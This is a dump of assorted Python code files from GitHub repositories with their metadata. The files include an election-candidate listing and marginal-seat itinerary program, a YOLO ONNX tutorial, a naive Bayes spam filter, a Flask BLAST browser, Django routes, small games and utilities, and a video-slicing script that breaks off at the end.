print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-bySTATE\"+state+\"ordbySURNAME\"\n AfileWriteout(q, filename)\n \n elif order == \"B\":\n #FITLER BY STATE ORDER BY PARTYNAME\n i = 0\n size = 0\n BT = DSABinaryTrees()\n while i != len(data):\n if data[i][0] == state:\n inKey = data[i][4]+\"\\t| \"+data[i][6]+\" \"+data[i][7]\n #inKey is \"partyName | Fullname\" to avoid double key\n BT.insert(inKey, data[i][7]) #inValue is firstname (?)\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\nList of Candidates, filtered by State and ordered by Party\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n \n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-bySTATE\"+state+\"ordbyPARTY\"\n AfileWriteout(q, filename)\n\n\ndef insertTreePARTY(party):\n \"\"\"Inserting items by party to a Binary Tree and preorder display.\n\n Keyword arguments:\n party -- chosen party\n order -- order is default by surname\n \"\"\"\n #PARTY FILTER SURNAME(DEFAULT) ORDER\n i = 0\n size = 0\n BT = DSABinaryTrees()\n if party == \"A\":\n party = \"LP\"\n elif party == \"B\":\n party = \"ALP\"\n elif party == \"C\":\n party = \"GRN\"\n elif party == \"D\":\n party = \"NP\"\n while i != len(data):\n if data[i][3] == party: #row i col 4 (partyNm)\n inKey = data[i][6]+\" \"+data[i][7]\n BT.insert(inKey, data[i][4]) #key=inKey, value=PartyName\n size = size + 1\n i = i + 1\n q = BT.inorderTraverse(BT.root, size)\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\tList of Candidates, filtered by Party and ordered by Surname\")\n print(\"\\tPARTY NAME: \"+party+\"\\n\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n print(curNode.divName)\n except StopIteration as error:\n print(error)\n print(\"\\n----------------------------------------------------------------\")\n\n #Ask to write file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"ACandidateList-byPARTY\"+party+\"ordbySURNAME\"\n AfileWriteout(q, filename)\n\n\ndef AfileWriteout(q, filename):\n \"\"\"Write results into a txt file.\n\n Keyword arguments:\n q -- output queue used for display\n filename -- name of file to be written\n \"\"\"\n filename1 = filename + \".txt\"\n f = open(filename1, \"w+\")\n f.write(str(filename)+\"\\n\\n\")\n f.close()\n f = open(filename1, \"a+\")\n a = iter(q.queue)\n try:\n n = q.queue.getSize()\n for i in range(n):\n curNode = next(a)\n f.write(curNode.divName+\"\\n\")\n f.close()\n except StopIteration as error:\n print(error)\n \n\n\n\n# MENU STARTS HERE ============================================================\n\n\nmainMenu()\nchoice = input(\"Your Selection is (A-D):\\t\")\n\nwhile choice.upper() != \"\":\n\n if choice.upper() == \"A\":\n\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\n\\t\\t\\tLIST OF NOMINEES\")\n #Takes filter opt, order opt, read file insert to tree, and display preorder xD\n #Save report to file or not?\n AfilterMenu()\t\n\n #Ask if want to display more?\n again = input(\"\\n\\nWould you like to display more? (Y/N): \")\n while again.upper() != \"N\" and again.upper() == \"Y\":\n AfilterMenu()\n again = input(\"\\n\\nWould you like to display more? (Y/N): \")\n\n elif choice.upper() == \"B\":\n\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\n\\t\\t\\tNOMINEE SEARCH\")\n filterOpt = BfilterMenu() #A is state filter, B is party filter\n if filterOpt.upper() == \"A\":\n\n #Selecting filter and initialising BST\n displayState()\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n list1 = [\"ACT\", \"NSW\", \"VIC\", \"QLD\", \"TAS\", \"WA\", \"SA\", \"NT\"]\n while stateOpt.upper() not in list1:\n stateOpt = input(\"Selected state (ACT/NSW/VIC/etc): \")\n binaryTree = insert_bySTATE(stateOpt.upper(), data)\n \n #Begin taking input, match and display\n print(\"\\nSearching process:\")\n substring = input(\"Enter substring of surname... \")\n while substring == \"\":\n print(\"\\n\\t\\tSubstring can not be empty. Try again.\\n\")\n substring = input(\"Enter substring of surname... \")\n try:\n foundNode = binaryTree.find(substring.upper(), binaryTree.root)\t\t\n q = display_matchedInput(binaryTree, substring.upper())\n except MissingKeyTreeError as error:\n print(\"\\n\\t\\tNo match found.\")\n print(error)\n #if all entries for one division is already saved\n\n #Ask if user wants to write out report to file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"BCandidateList-bySTATE\"+stateOpt.upper()+\"by\"+substring.upper()\n BfileWriteout(q, filename)\n \n\n elif filterOpt.upper() == \"B\":\n \n #Selecting filter and initialising BST\n displayParty()\n partyOpt = input(\"Selected party is (A-D): \")\n list1 = [\"A\", \"B\", \"C\", \"D\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A-D): \")\n binaryTree = insert_byPARTY(partyOpt.upper(), data) \n\n #Begin taking input, match and display\n print(\"\\nSearching process:\")\n substring = input(\"Enter substring of surname... \")\n while substring == \"\":\n print(\"\\n\\t\\tSubstring can not be empty. Try again.\\n\")\n substring = input(\"Enter substring of surname... \")\n try:\n foundNode = binaryTree.find(substring.upper(), binaryTree.root)\n q = display_matchedInput(binaryTree, substring.upper())\n print(q.getCount())\n except MissingKeyTreeError as error:\n print(\"\\n\\t\\tNo match found.\")\n print(error)\n\n #Ask if user wants to write out report to file\n writefile = ask_toWriteFile() \n if writefile == True:\n print(\"\\n\\t\\tFile Written\")\n filename = \"BCandidateList-byPARTY\"+partyOpt.upper()+\"by\"+substring.upper()\n BfileWriteout(q, filename)\n\n\n elif choice.upper() == \"C\":\n\n #Displaying options for state\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\t\\tCALCULATING MARGINAL SEATS BY PARTY\")\n print(\"\\n\\nWhich party would you like?\")\n print(\"A. Labor\\t\\t B. Liberal\")\n partyOpt = input(\"Selected party is (A/B): \")\n list1 = [\"A\", \"B\"]\n while partyOpt.upper() not in list1:\n partyOpt = input(\"Selected party is (A/B): \")\n if partyOpt.upper() == \"A\":\n party = [\"ALP\", \"LaborParty\"]\n elif partyOpt.upper() == \"B\":\n party = [\"LP\", \"LiberalParty\"]\n\n #Ask for custom margin\n print(\"\\n\\nWould you like a custom margin? (default is 6%)\")\n marginOpt = input(\"Insert as integer or press enter \\t\")\n if marginOpt == \"\":\n m = 6\n else:\n while marginOpt.isdigit == False: #while not empty string (enter)\n marginOpt = input(\"Insert as integer or press enter \\t\")\n m = int(marginOpt)\n print(\"\\nCalulating votes...\\n\") \n\n #Calculating votes and margin through all states\n ACT_divList = listDivisions_byState(act)\n ACT_marginal = calculateMargin(act, party[0], ACT_divList, m)\n print(\"ACT DONE (margin \"+str(m)+\"%)\\n\")\n NSW_divList = listDivisions_byState(nsw)\n NSW_marginal = calculateMargin(nsw, party[0], NSW_divList, m)\n print(\"NSW DONE (margin \"+str(m)+\"%)\\n\")\n VIC_divList = listDivisions_byState(vic)\n VIC_marginal = calculateMargin(vic, party[0], VIC_divList, m)\n print(\"VIC DONE (margin \"+str(m)+\"%)\\n\")\n QLD_divList = listDivisions_byState(qld)\n QLD_marginal = calculateMargin(qld, party[0], QLD_divList, m)\n print(\"QLD DONE (margin \"+str(m)+\"%)\\n\")\n TAS_divList = listDivisions_byState(tas)\n TAS_marginal = calculateMargin(tas, party[0], TAS_divList, m)\n print(\"TAS DONE (margin \"+str(m)+\"%)\\n\")\n WA_divList = listDivisions_byState(wa)\n WA_marginal = calculateMargin(wa, party[0], WA_divList, m)\n print(\"WA DONE (margin \"+str(m)+\"%)\\n\")\n SA_divList = listDivisions_byState(sa)\n SA_marginal = calculateMargin(sa, party[0], SA_divList, m)\n print(\"SA DONE (margin \"+str(m)+\"%)\\n\")\n NT_divList = listDivisions_byState(nt)\n NT_marginal = calculateMargin(nt, party[0], NT_divList, m)\n print(\"NT DONE (margin \"+str(m)+\"%)\\n\")\n\n #Option to write to file\n writeout = input(\"\\nWould you like to save results to a txt file? Y/N \")\n if writeout.upper() == \"Y\":\n customName = input(\"\\nEnter name of output file without filetype\"+\n \"\\n(or press enter for default): \")\n if customName == '':\n filename1 = party[1]+\"_MarginalSeatList\"+str(m)+\"%.txt\"\n else:\n filename1 = customName+\".txt\"\n f = open(filename1, \"w+\")\n f.write(\"List of Marginal Seats of \"+party[1]+\" in Australia\\n\"+\n \"Margin used: \"+str(m)+\"%\\n\\n\")\n f.close()\n CfileWriteout(filename1, ACT_marginal)\n CfileWriteout(filename1, NSW_marginal)\n CfileWriteout(filename1, VIC_marginal)\n CfileWriteout(filename1, QLD_marginal)\n CfileWriteout(filename1, TAS_marginal)\n CfileWriteout(filename1, WA_marginal)\n CfileWriteout(filename1, SA_marginal)\n CfileWriteout(filename1, NT_marginal)\n \n\n elif choice.upper() == \"D\":\n\n #ask what marginal to refer to?\n print(\"\\n----------------------------------------------------------------\")\n print(\"\\n\\t\\tITINERARY BASED ON MARGINAL SEATS\")\n print(\"\\nTo create itinerary, you must have an existing marginal\"\n +\"\\nseat file saved for a certain party and certain margin.\")\n #try to find file and use exception if not found\n while True:\n filename = askFilename()\n print(\"filename is:\"+filename)\n try:\n fileobj = open(filename)\n marginal = fileobj.readlines()\n except OSError as error:\n print(error.errno)\n else:\n break\n print(\"out of while\")\n\n #process the txt file using regex\n marginList = readInputFile(marginal) \n\n #all airports connect to other airports\n #make the graph, connect the airports\n #loc is for locations (so it makes sense :D )\n loc = insertAirport(airport, marginList) \n\n #read from elect and add to graph\n loc = insertElect(loc, elect, marginList)\n\n #erm do i BFS now??????????\n #use dijkstra\n #only take to and from nodes that are in marginList`\n minutes = 0\n for i in range(0,len(marginList),2):\n src = marginList[i]\n if int(i)+2 > len(marginList)-1:\n break\n dst = marginList[i+2]\n D,P = Dijkstra(loc,src)\n print(\"\\n\\n\\n\\n================================================================\")\n print(\"Path from \"+src+\" to \"+dst)\n path = DSAStack()\n\n try:\n previousV = P[dst]\n except KeyError as error:\t\t#need to change state\n print(\"\\n\\t==Must go to airport first!==\\n\")\n tempSrc = marginList[i+1]\t#currentState airport\n tempDst = marginList[i+3]\t#destState airport\n srcAirport = findAirport(tempSrc)\n dstAirport = findAirport(tempDst)\n #Div to airport\n makePath(P,path, src, srcAirport)\n print(srcAirport)\n print(\"Total time taken for trip is: \"+str(D[srcAirport])+\"\\n\")\n minutes = minutes + D[srcAirport]\n #Airport to Airport\n makePath(P,path, srcAirport, dstAirport)\n print(dstAirport)\n print(\"Total time taken for trip is: \"+str(D[dstAirport])+\"\\n\")\n minutes = minutes + D[dstAirport]\n #Airport to Division\n src = dstAirport\n D,P = Dijkstra(loc, src)\n\n makePath(P, path, src, dst)\n print(dst)\n print(\"Total time taken for trip is: \"+str(D[dst])+\"\\n\")\n minutes = minutes + D[dst]\n print(\"\\n\\nTotal travel time accross all marginal division: \"+str(minutes)+\" minutes\\n\")\n\n #when each option has been executed, show main menu again\n mainMenu()\n choice = input(\"Your Selection is (A-D):\\t\")\n\n\n","repo_name":"amandaefendi/uniprojects","sub_path":"Data Structures - Census Data 2018/mains.py","file_name":"mains.py","file_ext":"py","file_size_in_byte":20085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41165210611","text":"import numpy\n\nfrom pathlib import Path\nimport onnxruntime_extensions\n\n\ndef get_yolo_model(version: int, onnx_model_name: str):\n # install yolov8\n from pip._internal import main as pipmain\n try:\n import ultralytics\n except ImportError:\n pipmain(['install', 'ultralytics'])\n import ultralytics\n pt_model = Path(f\"yolov{version}n.pt\")\n model = ultralytics.YOLO(str(pt_model)) # load a pretrained model\n exported_filename = model.export(format=\"onnx\") # export the model to ONNX format\n assert exported_filename, f\"Failed to export yolov{version}n.pt to onnx\"\n import shutil\n shutil.move(exported_filename, onnx_model_name)\n\n\ndef add_pre_post_processing_to_yolo(input_model_file: Path, output_model_file: Path):\n \"\"\"Construct the pipeline for an end2end model with pre and post processing. \n The final model can take raw image binary as inputs and output the result in raw image file.\n\n Args:\n input_model_file (Path): The onnx yolo model.\n output_model_file (Path): where to save the final onnx model.\n \"\"\"\n from onnxruntime_extensions.tools import add_pre_post_processing_to_model as add_ppp\n add_ppp.yolo_detection(input_model_file, output_model_file, \"jpg\", onnx_opset=18)\n\n\ndef run_inference(onnx_model_file: Path):\n import onnxruntime as ort\n import numpy as np\n\n providers = ['CPUExecutionProvider']\n session_options = ort.SessionOptions()\n session_options.register_custom_ops_library(onnxruntime_extensions.get_library_path())\n\n image = np.frombuffer(open('../test/data/ppp_vision/wolves.jpg', 'rb').read(), dtype=np.uint8)\n session = ort.InferenceSession(str(onnx_model_file), providers=providers, sess_options=session_options)\n\n inname = [i.name for i in session.get_inputs()]\n inp = {inname[0]: image}\n output = session.run(['image_out'], inp)[0]\n output_filename = '../test/data/result.jpg'\n open(output_filename, 'wb').write(output)\n from PIL import Image\n Image.open(output_filename).show()\n\n\nif __name__ == '__main__':\n # YOLO version. Tested with 5 and 8.\n version = 8\n onnx_model_name = Path(f\"../test/data/yolov{version}n.onnx\")\n if not onnx_model_name.exists():\n print(\"Fetching original model...\")\n get_yolo_model(version, str(onnx_model_name))\n\n onnx_e2e_model_name = onnx_model_name.with_suffix(suffix=\".with_pre_post_processing.onnx\")\n print(\"Adding pre/post processing...\")\n add_pre_post_processing_to_yolo(onnx_model_name, onnx_e2e_model_name)\n print(\"Testing updated model...\")\n run_inference(onnx_e2e_model_name)\n","repo_name":"yxliang/onnxruntime-extensions","sub_path":"tutorials/yolo_e2e.py","file_name":"yolo_e2e.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26414584849","text":"#!/usr/bin/env python2\n\n\n\n# Importing Logger, See logger.py for configuration.\nimport os\nimport sys\n\nfrom logger import log\n\nfrom subjects import EmployeeFile\nfrom subjects import FacilityRequest\n\nWORK_PATH = '/home/mix-man/temp/Work/'\nSOURCE_PATH = WORK_PATH\n\nPATH_FAC_REQUEST = '/home/mix-man/temp/Facility Requests'\n\n\nclass ProcessFile(object):\n\n def __init__(self, SOURCE):\n self.FILENAME = os.path.basename(SOURCE)\n self.BASE_DIR = os.path.dirname(SOURCE)\n self.REL_BASE_DIR = os.path.relpath(self.BASE_DIR, SOURCE_PATH)\n self.SUBJECT, self.TYPE = os.path.split(self.REL_BASE_DIR)\n\n log.debug('[{0}] FILENAME : {1}'.format(SOURCE, self.FILENAME ))\n log.debug('[{0}] BASE_DIR : {1}'.format(SOURCE, self.BASE_DIR))\n log.debug('[{0}] REL_BASE_DIR : {1}'.format(SOURCE, self.REL_BASE_DIR))\n log.debug('[{0}] SUBJECT : {1}'.format(SOURCE, self.SUBJECT))\n log.debug('[{0}] TYPE : {1}'.format(SOURCE, self.TYPE))\n\n def Subject(self):\n if \"Facility Requests\" in self.REL_BASE_DIR: return 'Facility Request'\n if 'Employee File' in self.SUBJECT: return 'Employee File'\n return 'Unknown'\n\n\n\ndef Start(SOURCE):\n '''\n Detects which \"Subject\" the file is and sends it to the correct handler\n '''\n\n log.info(' ')\n log.info('--------------------------------------------')\n log.info('[{0}]: Processing File'.format(SOURCE))\n\n file = ProcessFile(SOURCE)\n\n if file.Subject() == 'Unknown':\n log.critical('[{0}]: Unable to determine subject!'.format(SOURCE))\n sys.exit()\n\n elif file.Subject() == 'Facility Request':\n log.debug('[{0}]: Detected Facility Request...'.format(SOURCE))\n FacilityRequest.Start(SOURCE, PATH_FAC_REQUEST)\n\n\n elif file.Subject() == 'Employee File':\n pass\n\n else:\n log.critical('[{0}]: Unknown error has occured while processing file...'.format(SOURCE))\n sys.exit()\n\nfor DIR, SUB, FILES in os.walk(os.path.join(SOURCE_PATH,'Facility Requests')):\n for FILE in FILES:\n Start(os.path.join(DIR, FILE))\n\n# for file in os.listdir(SOURCE_PATH):\n# print file\n\n# Start('/home/mix-man/Facility Requests/2018-01-01 - DAY-CREW - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01 - 0800-0900 - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01T1630 - 2018-01-02T1800 - MPR.pdf')\n# Start('/home/mix-man/Facility Requests/2018-01-01T1630 - 2018-01-02T1800 - MPR - Special Setup.pdf')\n# Start('/home/mix-man/Employee Files/Training/Last, First - 2018-06-09 - EEO.pdf')\n# Start('/home/mix-man/Employee Files/Leave Slips/Last, First - 2018-06-09T0700 - 2018-06-09T1600 - Message.pdf')\n# Start('/home/mix-man/Last, First - 2018-06-09T0700 - 2018-06-09T1600 - Message.pdf')\n\n","repo_name":"djmixman/Work-Repo","sub_path":"MFHandler/mfhandler/mfhandler.py","file_name":"mfhandler.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5889989766","text":"def count_ways(n): \n \"\"\"\n To count number of ways \n one can move from A to B\n \"\"\"\n if n==0:\n return 1\n elif n==1:\n return 2\n elif n==2:\n return 3\n\n edges = [0 for i in range(0, n + 1)] \n\n # base cases \n edges[0] = edges[1] = 1\n edges[2] = 2\n edges[3] = 4\n\n # Iterate from 4 to n \n for i in range(4, n + 1): \n edges[i] = edges[i - 1] + edges[i - 2] + edges[i - 3] \n\n return edges[-1] \n \n \n# Driver code \nif __name__ == \"__main__\":\n n = int(input())\n while(n > 0):\n stations = int(input())\n print(count_ways(stations))\n n-=1","repo_name":"navaneethsdk/Codehub","sub_path":"general/train_trip.py","file_name":"train_trip.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74365153682","text":"import time\n\nt = input(\"Digite o tempo em (segundos): \")\n #tratando o digito com um numero inteiro\nif t.isdigit():\n t = int(t)\nelse:\n print(\"Entrada Invalida\")\n quit()\n #tratamento do cronometro usando divmod e time.sleep\nwhile t:\n minutes, seconds = divmod(t, 60)\n timer = \"{:02d}:{:02d}\".format(minutes, seconds)\n print(timer, end=\"\\r\")\n time.sleep(1)\n t -= 1\nprint(\"Tempo Acabou!!!\")","repo_name":"zeldinha00/Projetos_Python_Iniciantes","sub_path":"04_Projeto_Cronometro/04_cronometro.py","file_name":"04_cronometro.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29739621130","text":"#!/usr/bin/env python\n\nfrom db_functions import get_targets, get_rows_for_target\nfrom flask import Flask, request, render_template\n\n# create web application\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n targets_list = get_targets()\n return render_template('index.html',targets=targets_list)\n\n@app.route('/results')\ndef show_results():\n target = request.args['target']\n evalue = float(request.args['cutoff'])\n blast_results = get_rows_for_target(target,evalue)\n return render_template('results.html',rows=blast_results)\n\nif __name__ == \"__main__\":\n # start the web application\n app.run()\n","repo_name":"Hz-Lin/wur_bioinfomatics","sub_path":"Practical_Computing/w5d4/blast_browser.py","file_name":"blast_browser.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72255764560","text":"# _*_ coding: utf-8 _*_\n\nimport numpy as np\nimport os\n\ndef textParser(text):\n import re\n regEx = re.compile(r'[^a-zA-Z]|\\d') # 匹配非字母或者数字,即去掉非字母非数字,只留下单词\n words = regEx.split(text)\n # 去除空字符串,并统一小写\n words = [word.lower() for word in words if len(word) > 0]\n return words\n\ndef loadEMailData(spamFileDir,hamFileDir):\n classCategory = [] # 类别标签,1表示是垃圾S邮件,0表示正常邮件\n Words = []\n for filename in os.listdir(spamFileDir):\n with open(spamFileDir + '/' + filename, 'r') as email:\n classCategory.append(1)\n words = textParser(email.read())\n Words.append(words)\n\n for filename in os.listdir(hamFileDir):\n with open(hamFileDir + '/' + filename, 'r') as email:\n classCategory.append(0)\n words = textParser(email.read())\n Words.append(words)\n return Words, classCategory\n\ndef createVocabularyList(Words):\n vocabularySet = set([])\n for words in Words:\n vocabularySet = vocabularySet | set(words)\n vocabularyList = list(vocabularySet)\n return vocabularyList\n\ndef setOfWordsToVecTor(vocabularyList, Words):\n vocabMarked = [0] * len(vocabularyList)\n for Word in Words:\n if Word in vocabularyList:\n vocabMarked[vocabularyList.index(Word)] = 1\n return vocabMarked\n\n\ndef setOfWordsListToVecTor(vocabularyList, WordsList):\n vocabMarkedList = []\n for i in range(len(WordsList)):\n vocabMarked = setOfWordsToVecTor(vocabularyList, WordsList[i])\n vocabMarkedList.append(vocabMarked)\n return vocabMarkedList\n\n\ndef trainingNaiveBayes(trainMarkedWords, trainCategory):\n # 样本总数\n numTrainDoc = len(trainMarkedWords)\n # 特征总数\n numWords = len(trainMarkedWords[0])\n # 垃圾邮件的先验概率P(S)\n pSpam = sum(trainCategory) / (float(numTrainDoc) + numWords)\n # 对每一个特征统计其在不同分类下样本中的出现次数总和\n wordsInSpamNum = np.ones(numWords)\n wordsInHamNum = np.ones(numWords)\n spamWordsNum = 2\n HamWordsNum = 2\n for i in range(0, numTrainDoc):\n if trainCategory[i] == 1: # 如果是垃圾邮件\n wordsInSpamNum += trainMarkedWords[i]\n spamWordsNum += 1 # 统计Spam分类下语料库中词汇出现的总次数\n else:\n wordsInHamNum += trainMarkedWords[i]\n HamWordsNum += 1\n pWordsSpam = np.log(wordsInSpamNum / spamWordsNum)\n pWordsHam = np.log(wordsInHamNum / HamWordsNum)\n return pWordsSpam, pWordsHam, pSpam\n\ndef classify(vocabularyList, pWordsSpam, pWordsHam, pSpam, testWords):\n testWordsCount = setOfWordsToVecTor(vocabularyList, testWords)\n testWordsMarkedArray = np.array(testWordsCount)\n # 计算P(Ci|W),W为向量。P(Ci|W)只需计算P(W|Ci)P(Ci)\n p1 = sum(testWordsMarkedArray * pWordsSpam) + np.log(pSpam)\n p0 = sum(testWordsMarkedArray * pWordsHam) + np.log(1 - pSpam)\n if p1 > p0:\n return 1\n else:\n return 0","repo_name":"eurekao/spam-bayes-filter","sub_path":"python/NavieBayes.py","file_name":"NavieBayes.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22910620442","text":"#programming game test\n#BatNum\n\n#imports\nimport time\nimport random\n\n#global var\nglobal gameon\ngameon=True\n\n#SCRIPS\nglobal i_will_pick\ni_will_pick=[\"I will pick a 3-digit number... Can you guess it?\",\"I will Pick own number, and it is a 3-digit number!\"]\nglobal do_this\ndo_this=[\"Go!\",\"Guess what~\",\"You still wrong.. haha\",\"Lets try!\",\"Guess what!\"]\nglobal cant_understand\ncant_understand=[\"It is not digits...\"]\nglobal wrong_len\nwrong_len=[\"Hey player, I said... I think 3 digits NUMBER!\"]\nglobal you_correct\nyou_correct=[\"You Right!\",\"Congraturation!\"]\n\n\ndef say(usr, msg):\t\t#it will support TTS on make through say msg cmd.\n\tprint(\"[\"+time.strftime(\"%M:%S\",time.localtime())+\"] \"+\"(\"+usr+\") \"+msg)\n\ndef getScript(scrList):\t#pick script randomly\n\tif len(scrList)==0:\n\t\treturn \"\"\n\telse:\n\t\treturn scrList[random.randint(0,len(scrList)-1)]\n\ndef check(targetNum,cmd):\t\t\t#1->clear -1->Buged\n\tglobal wrong_len\n\tif len(cmd)==1:\n\t\tcmd=\"00\"+cmd\n\telif len(cmd)==2:\n\t\tcmd=\"0\"+cmd\n\telif len(cmd)==3:\n\t\tpass\n\telse:\n\t\tsay(\"Computer\",getScript(wrong_len))\n\t\treturn -1\n\tresultMsg=\"\"\n\tscore=0\n\tfor i in range(0,len(cmd)):\n\t\tif cmd[i]==targetNum[i]:\n\t\t\tif score==0:\n\t\t\t\tresultMsg+=\"FERMI\"\n\t\t\t\tscore+=2\n\t\t\telse:\n\t\t\t\tresultMsg+=\", FERMI\"\n\t\t\t\tscore+=2\n\t\telse:\n\t\t\tfor ii in range(0,len(cmd)):\n\t\t\t\tif cmd[i]==targetNum[ii]:\n\t\t\t\t\tif score==0:\n\t\t\t\t\t\tresultMsg+=\"PICO\"\n\t\t\t\t\t\tscore+=1\n\t\t\t\t\t\tii=len(cmd)+10\n\t\t\t\t\telse:\n\t\t\t\t\t\tresultMsg+=\", PICO\"\n\t\t\t\t\t\tscore+=1\n\t\t\t\t\t\tii=len(cmd)+10\n\tif score==0:\n\t\tresultMsg+=\"BAGELS\"\n\telif score==6:\n\t\treturn 1\n\tsay(\"Computer\",resultMsg)\n\n\ndef game():\t\t\t\t#game loop\n\tglobal i_will_pick\n\tglobal do_this\n\tglobal cant_understand\n\tglobal you_correct\n\n\tstartTime=time.time()\n\tclear=False\n\ttargetNum=str(random.randint(0,999))\n\ttryTimes=1\n\t# make 3 digits\n\tif len(targetNum)==1:\n\t\ttargetNum=\"00\"+targetNum\n\telif len(targetNum)==2:\n\t\ttargetNum=\"0\"+targetNum\n\telse:\n\t\tpass\n\tprint(\"targetNum+\"+targetNum)\n\tsay(\"Computer\",getScript(i_will_pick))\n\twhile not(clear):\n\t\t#try:\n\t\tif tryTimes>20:\t\t# check player faild\n\t\t\tsay(\"Computer\",\"You Faild!\")\n\t\t\tclear=True\n\t\t\tbreak\n\t\tsay(\"Computer\",getScript(do_this))\n\t\tinp=input(\"Try \"+str(tryTimes)+\" Times >U>S>E>R> \")\n\t\tif inp==\"show me the money\":\n\t\t\tsay(\"System\",\"Cheat Result : \"+str(targetNum))\n\t\tcheckResult=check(targetNum,inp)\n\t\tif checkResult==1:\n\t\t\tsay(\"Computer\",getScript(you_correct))\n\t\t\tclear=True\n\t\t\tendTime=time.time()\n\t\t\tsay(\"Computer\",\"You take \"+str(tryTimes)+\" Times and \"+str(int(endTime-startTime))+\" Seconds.\")\n\t\t\tbreak\n\t\ttryTimes+=1\n\nwhile gameon:\t\t\t#main loop\n\tprint(\"===============================\")\n\tprint(\"= S T A R T ? =\")\n\tprint(\"===============================\")\n\tsay(\"System\",\"Do You Want To Start? (Y:Yes, N:No)\")\n\ttry:\n\t\tinp = input(\">U>S>E>R> \")\n\texcept:\n\t\tsay(\"System\",\"Check your python version. This game need python3.x~\")\n\t\texit()\n\tif inp.lower()==\"y\":\n\t\tgame()\n\telif inp.lower()==\"n\":\n\t\texit()\n\telse:\n\t\tprint(\"Wrong input: \"+inp.lower())","repo_name":"gmlwns2000/computer_science","sub_path":"test_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73214355601","text":"from django.contrib import admin\nfrom django.urls import path\nfrom web.views import createCustomer,createProduct,CustomerList,ProductList,index_view,ProductDetailView,CustomerDetailView\nfrom web.views import UpdateCustomer,edit_view,UpdateProduct,editcus_view,editpro_view,clist,plist,DeleteCustomer,DeleteProduct,logout\nfrom web.views import trans_view,Createtrans,search,searchbyname,searchdate,searchbydate,searchbydatename,searchdatenameform,login\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',index_view),\n path('edit/',edit_view),\n path('customer/create/',createCustomer.as_view()),\n path('customer/',CustomerList.as_view()),\n path('customer/detail//',CustomerDetailView.as_view()),\n path('product/create/',createProduct.as_view()),\n path('product/',ProductList.as_view()),\n path('product/detail//',ProductDetailView.as_view()),\n path('edit/customer/update//',UpdateCustomer.as_view()),\n path('edit/product/update//',UpdateProduct.as_view()),\n path('edit/customer/',editcus_view),\n path('edit/product/',editpro_view),\n path('edit/customer/update/',clist),\n path('edit/product/update/',plist),\n path('edit/customer/delete//',DeleteCustomer.as_view()),\n path('edit/product/delete//',DeleteProduct.as_view()),\n path('edit/customer/delete/',clist),\n path('edit/product/delete/',plist),\n path('trans/',trans_view), \n path('trans/create/',Createtrans.as_view()),\n path('trans/search/',search),\n path('trans/search/name/',searchbyname),\n path('trans/searchd/',searchdate),\n path('trans/search/date/',searchbydate),\n path('trans/searchdatename/',searchdatenameform),\n path('trans/searchdatename/search/',searchbydatename),\n path('login/',login ,name='login'),\n path('logout/',logout ,name='logout'),\n \n]\n","repo_name":"Chintu612/mywebsite","sub_path":"myweb/myweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6432718781","text":"import cv2\nimport time\n\ndef main():\n # dir = '/Users/satousuguru/workspace/programing/python' \\\n # '/emotion_recognition/samples/datas/video_audio_record_send_sample_data/'\n dir = \"/Users/satousuguru/Movies/\"\n name = \"with_sota_kobayashi_cut\"\n ext = '.mp4'\n new_ext = '.mp4'\n # fmt = cv2.VideoWriter_fourcc('M','J','P','G')\n fmt = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n\n new_fps = 1\n cap = cv2.VideoCapture(dir + name + ext)\n size = (640, 360)\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n interval = int(fps/new_fps)\n writer = cv2.VideoWriter(dir + name + \"_slice\" + new_ext, fmt, new_fps, size)\n\n print(\"fps=\", fps, \"new_fps=\", new_fps, \"interval=\", interval)\n frame_num = 0\n\n while cap.isOpened():\n ret, frame = cap.read()\n frame_num += 1\n if not ret:\n break\n\n frame = cv2.resize(frame, size)\n # cv2.imshow(\"frame\", frame)\n # cv2.waitKey(1)\n if frame_num % interval == 0:\n writer.write(frame)\n\n writer.release()\n 